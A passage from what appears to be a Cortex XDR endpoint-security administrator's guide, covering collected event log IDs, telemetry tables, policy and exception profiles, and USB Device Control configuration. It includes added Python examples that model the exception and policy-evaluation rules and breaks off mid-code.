| Microsoft-Windows-Windows Defender/Operational | | 1116, 1119 | Modern Windows Defender event provider Detection events (1116 and 1119) |
| Microsoft-Windows-Windows Firewall With Advanced Security/Firewall | Microsoft-Windows-Windows Firewall With Advanced Security | 2004, 2005, 2006, 2009, 2033 | Windows Firewall With Advanced Security Local Modifications (Levels 0, 2, 4) |
| Security | | 4698, 4702 | Scheduled task created (4698), Scheduled task updated (4702) |
| Security | | 4778, 4779 | TS Session reconnect (4778), TS Session disconnect (4779) |
| Security | | 5140 | Network share object access, without IPC$ and Netlogon shares |
| Security | | 5140, 5142, 5144, 5145 | Network Share create (5142), Network Share Delete (5144), A network share object was checked to see whether client can be granted desired access (5145), Network share object access (5140) |
| Security | | 4616 | System Time Change (4616) |
| Security | | 4624 | Local logons, without network or service logon events |
| Security | | 1100, 1102 | Security Log cleared events (1102), EventLog Service shutdown (1100) |
| Security | | 4647 | User initiated logoff |
| Security | | 4634 | User logoff for all non-network logon sessions |
| Security | | 4624 | Service logon events if the user account isn't LocalSystem, NetworkService, LocalService |
| Security | | 5142, 5144 | Network Share create (5142), Network Share Delete (5144) |
| Security | | 4688 | Process Create (4688) |
| Security | Microsoft-Windows-Eventlog | | Event log service events specific to the Security channel |
| Security | | 4672 | Special Privileges (Admin-equivalent Access) assigned to new logon, excluding LocalSystem |
| Security | | 4732 | New user added to local security group |
| Security | | 4728 | New user added to global security group |
| Security | | 4756 | New user added to universal security group |
| Security | | 4733 | User removed from local Administrators group |
| Security | | 4886, 4887, 4888 | Certificate Services received certificate request (4886), Approved and Certificate issued (4887), Denied request (4888) |
| Security | | 4720, 4722, 4725, 4726 | New User Account Created (4720), User Account Enabled (4722), User Account Disabled (4725), User Account Deleted (4726) |
| Security | | 4624 | Network logon events |
| Security | | 4880, 4881, 4896, 4898 | CA Service Stopped (4880), CA Service Started (4881), CA DB row(s) deleted (4896), CA Template loaded (4898) |
| Security | | 4634 | Logoff events for Network Logon events |
| Security | | 6272, 6280 | RRAS events, only generated on Microsoft IAS server |
| Security | | 4689 | Process Terminate (4689) |
| Security | | 4648, 4776 | Local credential authentication events (4776), Logon with explicit credentials (4648) |

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 129
© 2020 Palo Alto Networks, Inc.
Additional Endpoint Data Collected for Mac Endpoints

| Category | Events | Attributes |
|---|---|---|
| Files | Create, Write, Delete, Rename, Move, Open | Full path of the modified file before and after modification; SHA256 and MD5 hash of the file after modification |
| Process | Start, Stop | Process ID (PID) of the parent process; PID of the process; Full path; Command line arguments; Integrity level, to determine whether the process is running with elevated privileges; Hash (SHA256 and MD5); Signature or signing certificate details |
| Network | Accept, Connect, Connect Failure, Disconnect, Listen, Statistics | Source IP address and port; Destination IP address and port; Failed connection; Protocol (TCP/UDP); Aggregated send/receive statistics for the connection |

Additional Endpoint Data Collected for Linux Endpoints

| Category | Events | Attributes |
|---|---|---|
| Files | Create, Open, Write, Delete | Full path of the file; Hash of the file (for specific files only, and only if the file was written) |
| Files | Copy, Move (rename) | Full paths of both the original and the modified files |
| Files | Change owner (chown), Change mode (chmod) | Full path of the file; Newly set owner/attributes |
| Network | Listen, Accept, Connect, Connect failure, Disconnect | Source IP address and port for explicit binds; Destination IP address and port; Failed TCP connections; Protocol (TCP/UDP) |
| Process | Start | PID of the child process; PID of the parent process; Full image path of the process; Command line of the process; Hash of the image (SHA256 and MD5) |
| Process | Stop | PID of the stopped process |

Apply Security Profiles to Endpoints
Cortex XDR provides out-of-the-box protection for all registered endpoints with a default security policy
customized for each supported platform type. To tune your security policy, you customize settings in a
security profile and attach the profile to a policy. Each policy that you create must apply to one or more
endpoints or endpoint groups.

STEP 1 | From Cortex XDR, create a policy rule.


Do either of the following:
• Select Endpoints > Policy Management > Policy Rules > + New Policy to begin a rule from scratch.
• Select Endpoints > Policy Management > Profiles, right-click the profile you want to assign and
Create a new policy rule using this profile.

STEP 2 | Define a Policy Name and optional Description that describes the purpose or intent of the
policy.

STEP 3 | Select the Platform for which you want to create a new policy.

STEP 4 | Select the desired Exploit, Malware, Restrictions, and Agent Settings profiles you want to
apply in this policy.

If you do not specify a profile, the Cortex XDR agent uses the default profile.

STEP 5 | Click Next.

STEP 6 | Use the filters to assign the policy to one or more endpoints or endpoint groups.
Cortex XDR automatically applies a filter for the platform you selected. To change the platform, go Back
to the general policy settings.

STEP 7 | Click Done.

STEP 8 | In the Policy Rules table, change the rule position, if needed, to order the policy relative to
other policies.

The Cortex XDR agent evaluates policies from top to bottom. When the Cortex XDR agent finds the first
match it applies that policy as the active policy. To move the rule, select the arrows and drag the policy
to the desired location in the policy hierarchy.

Right-click to View Policy Details, Edit, Save as New, Disable, and Delete.

Exceptions Security Profiles
To allow full granularity, Cortex XDR allows you to create exceptions from your baseline policy. These
exceptions allow you to exempt specific processes or files from examination by one or more security
modules, or to disable specific protection rules. In Cortex XDR, you can configure the following types of
policy exceptions:

| Exception Type | Description |
|---|---|
| Process exceptions | Define an exception for a specific process for one or more security modules. |
| Support exceptions | Import an exception from the Cortex XDR Support team. |
| Behavioral Threat Protection Rule Exception | An exception disabling a specific BTP rule across all processes. |
| Digital Signer Exception | (Windows only) An exception adding a digital signer to the list of allowed signers. |
| Java Deserialization Exception | (Linux only) An exception allowing a specific Java executable (jar, class). |
| Local File Threat Examination Exception | (Linux only) An exception allowing specific PHP files. |
There are two types of exceptions you can create:


• Policy exceptions that apply to specific policies and endpoints (see Add a New Exceptions Security
Profile)
• Global exceptions that apply to all policies (see Add a Global Endpoint Policy Exception)
To help you manage and assess your BIOC/IOC rules, Cortex XDR automatically creates a System
Generated rule exception if the same BIOC/IOC rule is detected by the same initiator hash on 100 different
endpoints within a 3 day timeframe.
Each BIOC/IOC detection restarts the 3 day timeframe. If 3 days pass without another detection, the
timeframe and the endpoint count are reset. For example:

Example A

| Day Number | BIOC/IOC Detections | Action |
|---|---|---|
| 1 | 98 detections | No exception created |
| 2 | 1 detection | No exception created |
| 4 | 1 detection | System Generated exception created |

Example B

| Day Number | BIOC/IOC Detections | Action |
|---|---|---|
| 1 | 98 detections | No exception created |
| 2 | 1 detection | No exception created |
| 6 | 99 detections | No exception created, since the detections were not within the 3 day timeframe |

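The two examples above replayed as code. This is an added illustration, not Cortex XDR's implementation: it applies the rule exactly as the text states it (same BIOC/IOC rule, same initiator hash, 100 distinct endpoints, a 3 day window that restarts on every detection and resets after 3 quiet days) to constructed detection records, and reproduces the outcomes of Example A and Example B. The rule name, hash and host names are placeholders.

```python
"""Replay of the System Generated exception rule for BIOC/IOC detections.

Added example, not Cortex XDR code. The threshold and window are the figures
given in the text; detection records are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

ENDPOINT_THRESHOLD = 100   # distinct endpoints needed for an exception
WINDOW_DAYS = 3            # quiet days after which the count resets

Key = Tuple[str, str]      # (BIOC/IOC rule, initiator hash)


@dataclass
class Detection:
    day: int               # day number, as in the examples
    rule_id: str
    initiator_hash: str
    endpoint_id: str


@dataclass
class _State:
    endpoints: Set[str] = field(default_factory=set)
    last_day: Optional[int] = None


def replay(detections: List[Detection]) -> Dict[Key, int]:
    """Return, per (rule, initiator hash), the day on which a System
    Generated exception is created. Keys with no exception are absent."""
    state: Dict[Key, _State] = {}
    created: Dict[Key, int] = {}
    for d in sorted(detections, key=lambda x: x.day):
        key = (d.rule_id, d.initiator_hash)
        if key in created:
            continue                      # exception already exists
        s = state.setdefault(key, _State())
        # More than WINDOW_DAYS since the previous detection: start over.
        if s.last_day is not None and d.day - s.last_day > WINDOW_DAYS:
            s.endpoints.clear()
        s.endpoints.add(d.endpoint_id)    # a set: one endpoint counts once
        s.last_day = d.day
        if len(s.endpoints) >= ENDPOINT_THRESHOLD:
            created[key] = d.day
    return created


def burst(day: int, count: int, first_index: int,
          rule: str = "bioc-example", initiator: str = "sha256:placeholder") -> List[Detection]:
    """`count` detections on `day`, each from a different constructed host."""
    return [Detection(day, rule, initiator, f"host-{first_index + i}") for i in range(count)]


# Example A: 98 on day 1, 1 on day 2, 1 on day 4 -> exception on day 4.
EXAMPLE_A = burst(1, 98, 0) + burst(2, 1, 98) + burst(4, 1, 99)

# Example B: 98 on day 1, 1 on day 2, 99 on day 6 -> no exception, because
# day 6 is more than 3 days after day 2, so the count restarts at 99.
EXAMPLE_B = burst(1, 98, 0) + burst(2, 1, 98) + burst(6, 99, 99)

if __name__ == "__main__":
    print("Example A:", replay(EXAMPLE_A))
    print("Example B:", replay(EXAMPLE_B))
```

The endpoint set is what makes the 100 meaningful: a single noisy host re-triggering the same rule hundreds of times never creates an exception, which is the behaviour you want before a rule is silenced fleet-wide.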
Add a New Exceptions Security Profile


You can configure exceptions that apply to specific groups of endpoints or you can Add a Global Endpoint
Policy Exception. Use the following workflow to create an endpoint-specific exception:

STEP 1 | Add a new profile.


1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Exceptions as the profile type.
3. Click Next.

STEP 2 | Define the basic settings.


1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | Configure the exceptions profile.


To configure a Process Exception:
1. Select the operating system.
2. Enter the name of the process.
3. Select one or more Endpoint Protection Modules that will allow this process to run. The modules
displayed on the list are the modules relevant to the operating system defined for this profile. To
apply the process exception on all security modules, Select all. To apply the process exception on all
exploit security modules, select Disable Injection.
4. Click the adjacent arrow.
5. After you’ve added all processes, click Create.
You can return to the Process Exception profile from the Endpoints Profile page at any point and edit
the settings, for example if you want to add or remove more security modules.
To configure a Support Exception:
1. Import the json file you received from Palo Alto Networks support team by either browsing for it in
your files or by dragging and dropping the file on the page.
2. Click Create.
To configure module specific exceptions relevant for the selected profile platform:
• Behavioral Threat Protection Rule Exception—When you view an alert for a Behavioral Threat
event which you want to allow in your network from now on, right-click the alert and Create alert
exception. Cortex XDR displays the alert data (Platform and Rule name). Select Exception Scope:
Profile and select the exception profile name. Click Add.

• Local Analysis Rules Exception—When you view an alert for a Local Analysis event triggered by
rules which you want to allow in your network from now on, right-click the alert and Create alert
exception. Cortex XDR displays the alert data (Platform and Rule names). Select Exception Scope:
Profile and select the exception profile name. The exception allows all the rules that triggered the
alert, and you cannot choose to allow only specific rules within the alert. Click Add.
• Digital Signer Exception—When you view an alert for a Digital Signer Restriction which you want
to allow in your network from now on, right-click the alert and Create alert exception. Cortex XDR
displays the alert data (Platform, Signer, and Generating Alert ID). Select Exception Scope: Profile and
select the exception profile name. Click Add.
• Java Deserialization Exception—When you identify a Suspicious Input Deserialization alert that
you believe to be benign and want to suppress future alerts, right-click the alert and Create alert
exception. Cortex XDR displays the alert data (Platform, Process, Java executable, and Generating
Alert ID). Select Exception Scope: Profile and select the exception profile name. Click Add.
• Local File Threat Examination Exception—When you view an alert for a PHP file which you want
to allow in your network from now on, right-click the alert and Create alert exception. Cortex XDR
displays the alert data (Process, Path, and Hash). Select Exception Scope: Profile and select the
exception profile name. Click Add.
At any point, you can click the Generating Alert ID to return to the original alert from which the
exception was originated. You cannot edit module specific exceptions.

STEP 4 | Apply Security Profiles to Endpoints.


If you want to remove an exceptions profile from your network, go to the Profiles page, right-click the
profile and select Delete.

Add a Global Endpoint Policy Exception


As an alternative to adding an endpoint-specific exception in policy rules, you can define and manage global
exceptions that apply across all of your endpoints. On the Global Exception page, you can manage all the
global exceptions in your organization for all platforms. Together with Exceptions Security Profiles, global
exceptions constitute the sum of all the exceptions allowed within your security policy rules.
• Add a Global Process Exception
• Add a Global Support Exception
• Add a Global Behavioral Threat Protection Rule Exception
• Add a Global Local Analysis Rules Exception
• Review Advanced Analysis Exceptions
• Add a Global Digital Signer Exception
• Add a Global Java Deserialization Exception
• Add a Global Local File Threat Examination Exception

Add a Global Process Exception


STEP 1 | Go to Endpoints > Policy Management > Policy Exceptions.

STEP 2 | Select Process exceptions.


1. Select the operating system.
2. Enter the name of the process.
3. Select one or more Endpoint Protection Modules that will allow this process to run. The modules
displayed on the list are the modules relevant to the operating system defined for this profile. To
apply the process exception on all security modules, Select all. To apply the process exception on all
exploit security modules, select Disable Injection. Click the adjacent arrow to add the exception.

STEP 3 | After you add all exceptions, Save your changes.


The new process exception is added to the Global Exceptions in your network and will be applied across
all rules and policies. To edit the exception, select it and click the edit icon. To delete it, select it and click
the delete icon.

Add a Global Support Exception


STEP 1 | Go to Endpoints > Policy Management > Policy Exceptions.

STEP 2 | Select Support exceptions.


Import the json file you received from Palo Alto Networks support team by either browsing for it in
your files or by dragging and dropping the file on the page.

STEP 3 | Click Save.
The new support exception is added to the Global Exceptions in your network and will be applied across
all rules and policies.

Add a Global Behavioral Threat Protection Rule Exception


When you view a Behavioral Threat alert in the Alerts table that you want to allow across your
organization, you can create a Global Exception for that rule.

STEP 1 | Right-click the alert and select Create alert exception.

STEP 2 | Review the alert data (platform and rule name) and select Exception Scope: Global.

STEP 3 | Click Add.
The relevant BTP exception is added to the Global Exceptions in your network and will be applied across
all rules and policies. At any point, you can click the Generating Alert ID to return to the original alert
from which the exception was originated. To delete a specific global exception, select it and click X. You
cannot edit global exceptions generated from a BTP security event.

Add a Global Local Analysis Rules Exception


When you view a Local Analysis alert in the Alerts table that was triggered by local analysis rules, you
can create a Global Exception to allow these rules across your organization.

STEP 1 | Right-click the alert and select Create alert exception.

STEP 2 | Review the alert data (platform and rule name) and select Exception Scope: Global.

STEP 3 | Click Add.
The relevant Local Analysis Rules exception is added to the Global Exceptions in your network and will
be applied across all rules and policies. The exception allows all the rules that triggered the alert, and you
cannot choose to allow only specific rules within the alert. At any point, you can click the Generating
Alert ID to return to the original alert from which the exception was originated. To delete a specific
global exception, select it and click X. You cannot edit global exceptions generated from a local analysis
security event.

Review Advanced Analysis Exceptions


With Advanced Analysis, Cortex XDR can provide a secondary validation of XDR Agent alerts raised by
exploit protection modules. To perform the additional analysis, Cortex XDR analyzes alert data sent by the
Cortex XDR agent. If Advanced Analysis indicates an alert is actually benign, Cortex XDR can automatically
create exceptions and distribute the updated security policy to your endpoints.
By enabling Cortex XDR to automatically create and distribute global exceptions you can minimize
disruption for users when they subsequently encounter the same benign activity. To enable the automatic
creation of Advanced Analysis Exceptions, configure the Advanced Analysis options in your Configure
Global Agent Settings.
For each exception, Cortex XDR displays the affected platform, exception name, and the relevant alert
ID for which Cortex XDR determined activity was benign. To drill down into the alert details, click the
Generating Alert ID.

Add a Global Digital Signer Exception


STEP 1 | Right-click the alert and select Create alert exception.
Review the alert data (Platform, signer, and alert ID) and select Exception Scope: Global.

STEP 2 | Click Add.
The relevant digital signer exception is added to the Global Exceptions in your network and will be
applied across all rules and policies. At any point, you can click the Generating Alert ID to return to the
original alert from which the exception was originated. To delete a specific global exception, select it and
click X. You cannot edit global exceptions generated from a digital signer restriction security event.

Add a Global Java Deserialization Exception


STEP 1 | Right-click the alert and select Create alert exception.
Review the alert data (Platform, Process, Java executable, and alert ID) and select Exception Scope:
Global.

STEP 2 | Click Add.
The relevant Java deserialization exception is added to the Global Exceptions in your network and will be
applied across all rules and policies. At any point, you can click the Generating Alert ID to return to the
original alert from which the exception was originated. To delete a specific global exception, select it and
click X. You cannot edit global exceptions generated from a Suspicious Input Deserialization security event.

Add a Global Local File Threat Examination Exception


STEP 1 | Right-click the alert and select Create alert exception.
Review the alert data (Process, Path, and Hash) and select Exception Scope: Global.

STEP 2 | Click Add.
The relevant PHP file is added to the Global Exceptions in your network and will be applied across
all rules and policies. At any point, you can click the Generating Alert ID to return to the original alert
from which the exception was originated. To delete a specific global exception, select it and click X.
You cannot edit global exceptions generated from a Local File Threat Examination security event.

Hardened Endpoint Security
Cortex XDR enables you to extend the security on your endpoints beyond the Cortex XDR agent built-
in prevention capabilities to provide an increased coverage of network security within your organization.
By leveraging existing mechanisms and added capabilities, the Cortex XDR agent can enforce additional
protections on your endpoints to provide a comprehensive security posture. Cortex XDR provides the
following hardened endpoint security capabilities:
• Device Control
• Host Firewall
• Disk Encryption
• Host Inventory
• Vulnerability Assessment
The following table describes for each capability the supported platforms and minimal agent version. A dash
(—) indicates the setting is not supported.

Hardened endpoint security capabilities are not supported for Android endpoints.

| Module | Windows | Mac | Linux |
|---|---|---|---|
| Device Control: protects endpoints from loading malicious files from USB-connected removable devices (CD-ROM, disk drives, floppy disks and Windows portable devices). | Cortex XDR agent 7.0 and later; for VDI, Cortex XDR agent 7.3 and later | Cortex XDR agent 7.2 and later | — |
| Host Firewall: protects endpoints from attacks originating in network communications to and from the endpoint. | Cortex XDR agent 7.1 and later | Cortex XDR agent 7.2 and later | — |
| Disk Encryption: provides visibility into endpoints that encrypt their hard drives using BitLocker or FileVault. | Cortex XDR agent 7.1 and later | Cortex XDR agent 7.2 and later | — |
| Host Inventory: provides full visibility into the business and IT operational data on all your endpoints. | Cortex XDR agent 7.1 and later | Cortex XDR agent 7.1 and later | Cortex XDR agent 7.1 and later |
| Vulnerability Assessment: identifies and quantifies the security vulnerabilities (CVEs) that exist for applications installed on your endpoints. | Cortex XDR agent 7.1 and later | — | Cortex XDR agent 7.1 and later |

Device Control
By default, all external USB devices are allowed to connect to your Cortex XDR endpoints. To protect
endpoints from connecting USB-connected removable devices—such as disk drives, CD-ROM drives,
floppy disk drives, and other portable devices—that can contain malicious files, Cortex XDR provides device
control.
For example, with device control, you can:
• Block all supported USB-connected devices for an endpoint group.
• Block a USB device type but add to your allow list a specific vendor from that list that will be accessible
from the endpoint.
• Temporarily block only some USB device types on an endpoint.
The following are prerequisites to enforce device control policy rules on your endpoints:

Windows
• Cortex XDR agent 7.0 or a later release.
• For VDI, Cortex XDR agent 7.3 or a later release. Note the following limitations:
  • Virtual environments use different stacks that might not be subject to the Device Control policy rules
    the Cortex XDR agent enforces. As a result, a USB device may be able to connect to the VDI instance
    even though the configured policy rules block it.
  • The Cortex XDR agent provides best-effort enforcement of Device Control policy rules on VDI
    instances that run on physical endpoints where no Cortex XDR agent is deployed.
  • For Citrix Virtual Apps and Desktops, Cortex XDR Device Control is supported on generic virtual
    channels only.
  • For VMware Horizon, you must disable Sharing > Allow access to removable storage in your
    VMware Horizon client settings.

Mac
• Cortex XDR agent 7.2 or a later release.

Linux
• Not supported.

Device control rules take effect on your endpoint only after the Cortex XDR agent deploys
the policy. If you already had a USB device connected to the endpoint, you have to
disconnect it and connect it again for the policy to take effect.

Device Control Profiles


To apply device control in your organization, you define device control profiles that determine which device
types Cortex XDR blocks and which it permits. There are two types of profiles:

| Profile | Description |
|---|---|
| Configuration Profile | Allow or block these USB-connected device type groups: Disk Drives; CD-Rom Drives; Floppy Disk Drives; (Windows only) Windows Portable Devices. The Cortex XDR agent relies on the device class assigned by the operating system. For Windows endpoints only, you can configure additional device classes (see Add a Custom Device Class). See Add a New Configuration Profile. |
| Exceptions Profile | Allow specific devices according to device type and vendor. You can further specify a specific product and/or product serial number. See Add a New Exceptions Profile. |

Device Configuration and Device Exceptions profiles are set for each operating system separately. After
you configure a device control profile, Apply Device Control Profiles to Your Endpoints.

Add a New Configuration Profile


STEP 1 | Log in to Cortex XDR.
Go to Endpoints > Policy management > Extension Profiles and select + New Profile. Select Platform
and click Device Configuration > Next.

STEP 2 | Fill in the General Information.


Assign the profile Name and add an optional Description. The profile Type and Platform are set by
Cortex XDR.

STEP 3 | Configure the Device Configuration.


For each group of device types, select whether to Allow or Block them on the endpoints. For Disk
Drives only, you can also allow devices to connect in Read-only mode. To use the default option
defined by Palo Alto Networks, leave Use Default selected.

Currently, the default is set to Use Default (Allow) however Palo Alto Networks may
change the default definition at any time.

STEP 4 | Save your profile.


When you’re done, Create your device profile definitions.
If needed, you can edit, delete, or duplicate your profiles.

You cannot edit or delete the default profiles pre-defined in Cortex XDR.

STEP 5 | (Optional) To define exceptions to your Device Configuration profile, Add a New Exceptions
Profile.

STEP 6 | Apply Device Control Profiles to Your Endpoints.

Add a New Exceptions Profile


STEP 1 | Log in to Cortex XDR.
Go to Endpoints > Policy management > Extension Profiles and select + New Profile. Select Platform
and click Device Exceptions > Next

STEP 2 | Fill in the General Information.


Assign the profile Name and add an optional Description. The profile Type and Platform are set by the
system.

STEP 3 | Configure Device Exceptions.


You can add devices to your allow list according to different sets of identifiers: vendor, product, and
serial number.
• (Disk Drives only) Permission—Select the permissions you want to grant: Read only or Read/Write.
• Type—Select the Device Type you want to add to the allow list (Disk Drives, CD-Rom, Portable, or
Floppy Disk).
• Vendor—Select a specific vendor from the list or enter the vendor ID in hexadecimal code.
• (Optional) Product—Select a specific product (filtered by the selected vendor) to add to your allow
list, or add your product ID in hexadecimal code.
• (Optional) Serial Number—Enter a specific serial number (pertaining to the selected product) to add
to your allow list. Only devices with this serial number are included in the allow list.

STEP 4 | Save your profile.


When you’re done, Create your device exceptions profile.
If needed, you can later edit, delete, or duplicate your profiles.

You cannot edit or delete the predefined profiles in Cortex XDR.

STEP 5 | Apply Device Control Profiles to Your Endpoints.

Apply Device Control Profiles to Your Endpoints


After you defined the required profiles for Device Configuration and Exceptions, you must configure
Device Control Policies and enforce them on your endpoints. Cortex XDR applies Device Control policies
on endpoints from top to bottom, as you’ve ordered them on the page. The first policy that matches the
endpoint is applied. If no policies match, the default policy that enables all devices is applied.
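The evaluation order just described, together with the profile semantics from Device Control Profiles and the permanent and temporary exceptions described in step 7 below, modelled in Python. This is an added example, not Cortex XDR code: the endpoints, rules, dates and USB vendor/product IDs are constructed, and the same top-to-bottom first-match ordering is what Apply Security Profiles to Endpoints describes for the protection Policy Rules.

```python
"""Model of Device Control policy evaluation. Added illustration, not Cortex
XDR code; all endpoints, devices and rules below are constructed."""
from dataclasses import dataclass, field
from datetime import date, timedelta
from typing import Callable, Dict, List, Optional, Sequence

DISK, CDROM, PORTABLE = "Disk Drives", "CD-Rom Drives", "Windows Portable Devices"
ALLOW, BLOCK, READ_ONLY = "Allow", "Block", "Read-only"
MAX_TEMP_DAYS = 30                 # temporary exceptions last at most 30 days
TODAY = date(2020, 11, 2)          # fixed "now" for the walkthrough


def days_after(start: date, n: int) -> date:
    return start + timedelta(days=n)


@dataclass(frozen=True)
class Device:
    device_type: str
    vendor_id: int                 # USB vendor/product IDs, hexadecimal in the UI
    product_id: int
    serial: str


@dataclass(frozen=True)
class Endpoint:
    name: str
    platform: str
    group: str


@dataclass
class ConfigProfile:
    """Allow/Block per device type (Read-only is offered for disk drives only);
    unset types take the Palo Alto Networks default, currently Allow."""
    actions: Dict[str, str] = field(default_factory=dict)

    def action_for(self, device_type: str) -> str:
        return self.actions.get(device_type, ALLOW)


@dataclass
class DeviceException:
    """Allow-list entry: vendor, optionally narrowed to product and serial."""
    device_type: str
    vendor_id: int
    product_id: Optional[int] = None     # None: any product of this vendor
    serial: Optional[str] = None         # None: any serial of this product
    permission: str = ALLOW              # ALLOW (read/write) or READ_ONLY
    expires: Optional[date] = None       # temporary exceptions only
    endpoint: Optional[str] = None       # temporary exception for one endpoint

    def matches(self, dev: Device) -> bool:
        return (dev.device_type == self.device_type and dev.vendor_id == self.vendor_id
                and self.product_id in (None, dev.product_id)
                and self.serial in (None, dev.serial))

    def active(self, ep: Endpoint, today: date) -> bool:
        in_scope = self.endpoint is None or self.endpoint == ep.name
        return in_scope and (self.expires is None or today <= self.expires)


@dataclass
class PolicyRule:
    name: str
    target: Callable[[Endpoint], bool]   # the rule's endpoint filter
    config: ConfigProfile
    exceptions: List[DeviceException] = field(default_factory=list)


def temporary_exception(dev: Device, today: date, days: int,
                        endpoint: Optional[Endpoint] = None) -> DeviceException:
    """Exception created from a violation: capped at 30 days and optionally
    limited to the endpoint that raised the violation."""
    return DeviceException(dev.device_type, dev.vendor_id, dev.product_id, dev.serial,
                           expires=days_after(today, min(days, MAX_TEMP_DAYS)),
                           endpoint=endpoint.name if endpoint else None)


def evaluate(ep: Endpoint, dev: Device, rules: Sequence[PolicyRule],
             permanent: Sequence[DeviceException] = (),
             temporary: Sequence[DeviceException] = (), today: date = TODAY) -> str:
    """Decide Allow, Block or Read-only for one device on one endpoint."""
    for ex in permanent:               # approve across all policies and platforms
        if ex.matches(dev):
            return ex.permission
    for ex in temporary:               # approve until expiry, on one or all endpoints
        if ex.matches(dev) and ex.active(ep, today):
            return ex.permission
    for rule in rules:                 # top to bottom; first matching rule wins
        if rule.target(ep):
            for ex in rule.exceptions:
                if ex.matches(dev):
                    return ex.permission
            return rule.config.action_for(dev.device_type)
    return ALLOW                       # default policy (always last): allow all


# Constructed walkthrough data, not from a real deployment.
FIN_WIN = Endpoint("fin-laptop-01", "windows", "finance")
ENG_WIN = Endpoint("eng-ws-07", "windows", "engineering")
APPROVED_DISK = Device(DISK, 0x0781, 0x5583, "4C530001")
OTHER_DISK = Device(DISK, 0x0951, 0x1666, "E0D55E6C")
RULES = [
    # Finance: block disks and portable devices; one approved vendor is read-only.
    PolicyRule("finance-lockdown", lambda e: e.group == "finance",
               ConfigProfile({DISK: BLOCK, PORTABLE: BLOCK}),
               [DeviceException(DISK, 0x0781, permission=READ_ONLY)]),
    # Every other Windows endpoint: disk drives read-only, other types default.
    PolicyRule("windows-readonly", lambda e: e.platform == "windows",
               ConfigProfile({DISK: READ_ONLY})),
]
```

Two points the model makes visible: a Mac in the engineering group matches neither rule and falls through to the default "allow all" policy, so a platform without a rule of its own is unprotected rather than locked down; and an exception entered with only a vendor ID (the finance read-only entry) admits every product that vendor ships, which is why the product and serial fields exist.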

STEP 1 | Log in to Cortex XDR.


Go to Endpoints > Policy management > Extension Policy Rules and select + New Policy.

STEP 2 | Configure settings for the Device Control policy.
1. Assign a policy name and select the platform. You can add a description.
The platform will automatically be assigned to Windows.
2. Assign the Device Type profile you want to use in this rule.
3. If desired, assign a Device Exceptions profile.
4. Click Next.
5. Select the target endpoints on which to enforce the policy.
Use filters or manual endpoint selection to define the exact target endpoints of the policy rules.
6. Click Done.

STEP 3 | Configure policy hierarchy.


Drag and drop the policies in the desired order of execution. The default policy that enables all devices
on all endpoints is always the last one on the page and is applied to endpoints that don’t match the
criteria in the other policies.

STEP 4 | Save the policy hierarchy.


After the policy is saved and applied to the agents, Cortex XDR enforces the device control policies on
your environment.

STEP 5 | (Optional) Manage your policy rules.


In the Protection Policy Rules table: you can view and edit the policy you created and the policy
hierarchy.
1. View your policy hierarchy.
2. Right-click to View Policy Details, Edit, Save as New, Disable, and Delete.

STEP 6 | Monitor device control violations.


After you apply Device Control rules in your environment, use the Endpoints > Device Control
Violations page to monitor all instances where end users attempted to connect restricted USB-
connected devices and Cortex XDR blocked them on the endpoint. All violation logs are displayed on the
page. You can sort the results, and use the filters menu to narrow down the results. For each violation
event Cortex XDR logs the event details, the platform, and the device details that are available.
If you see a violation for which you’d like to define an exception on the device that triggered it, right-
click the violation and select one of the following options:
• Add device to permanent exceptions—To ensure this device is always allowed in your network,
select this option to add the device to the Device Permanent Exceptions list.
• Add device to temporary exceptions—To allow this device only temporarily on the selected endpoint
or on all endpoints, select this option and set the allowed time frame for the device.
• Allow device to a profile exception—Select this option to allow the device within an existing Device
Exceptions profile.

STEP 7 | Tune your device control exceptions.


To better deploy device control in your network and allow further granularity, you can add devices on
your network to your allow list and grant them access to your endpoints. Device control exceptions are
configured per device and you must select the device category, vendor, and type of permission that
you want to allow on the endpoint. Optionally, to limit the exception to a specific device, you can also
include the product and/or serial number.
Cortex XDR enables you to configure the following exceptions:

| Exception Name | Description |
|---|---|
| Permanent Exceptions | Approve the device in your network across all Device Control policies and profiles. You can create them directly from the violation event that blocked the device, or through the Permanent Exceptions list. Permanent exceptions apply across platforms, allowing the devices on all operating systems. See Create a Permanent Exception. |
| Temporary Exceptions | Approve the device for a specific time period of up to 30 days. You create a temporary exception directly from the violation event that blocked the device. See Create a Temporary Exception. |
| Profile Exceptions | Approve the device in an existing exceptions profile. You create a profile exception directly from the violation event that blocked the device. See Create a Profile Exception. |

1. Create a Permanent Exception.


Permanent device control exceptions are managed in the Permanent Exception list and are applied to
all devices regardless of the endpoint platform.
• If you know in advance which device you’d like to allow throughout your network, create a
general exception from the list:
1. Go to Endpoints > Policy Management > Extensions and select Device Permanent Exceptions
on the left menu. The list of existing Permanent Exceptions is displayed.
2. Select: Type, Permission, and Vendor.
3. (Optional) Select a specific product and/or enter a specific serial number for the device.
4. Click the adjacent arrow and Save. The exception is added to the Permanent Exceptions list
and will be applied in the next heartbeat.
• Otherwise, you can create a permanent exception directly from the violation event that blocked
the device in your network:
1. On the Device Control Violations page, right-click the violation event triggered by the device
you want to permanently allow.
2. Select Add device to permanent exceptions. Review the exception data and change the
defaults if necessary.
3. Click Save.
2. Create a Temporary Exception.
1. On the Device Control Violations page, right-click the violation event triggered by the device you
want to temporarily allow.
2. Select Add device to temporary exceptions. Review the exception data and change the defaults if
necessary. For example, you can configure the exception to this endpoint only or to all endpoints
in your network, or set which device identifiers will be included in the exception.

3. Configure the exception TIME FRAME by defining the number of days or number of hours during
which the exception will be applied, up to 30 days.
4. Click Save. The exception is added to the Device Temporary Exceptions list and will be applied in
the next heartbeat.
3. Create an Exception within a Profile.
1. On the Device Control Violations page, right-click the violation event triggered by the device you
want to add to a Device Exceptions profile.
2. Select the PROFILE from the list.
3. Click Save. The exception is added to the Exceptions Profile and will be applied in the next
heartbeat.
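The way a blocked device is weighed against the permanent, temporary and profile exceptions described in this step, as an added Python example (not Cortex XDR code). The field names, the permission labels, the first-match order and the sample vendor, product and serial values are constructed assumptions; the 30-day limit, the endpoint scope and the optional product/serial identifiers follow the steps above.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, Optional, Sequence

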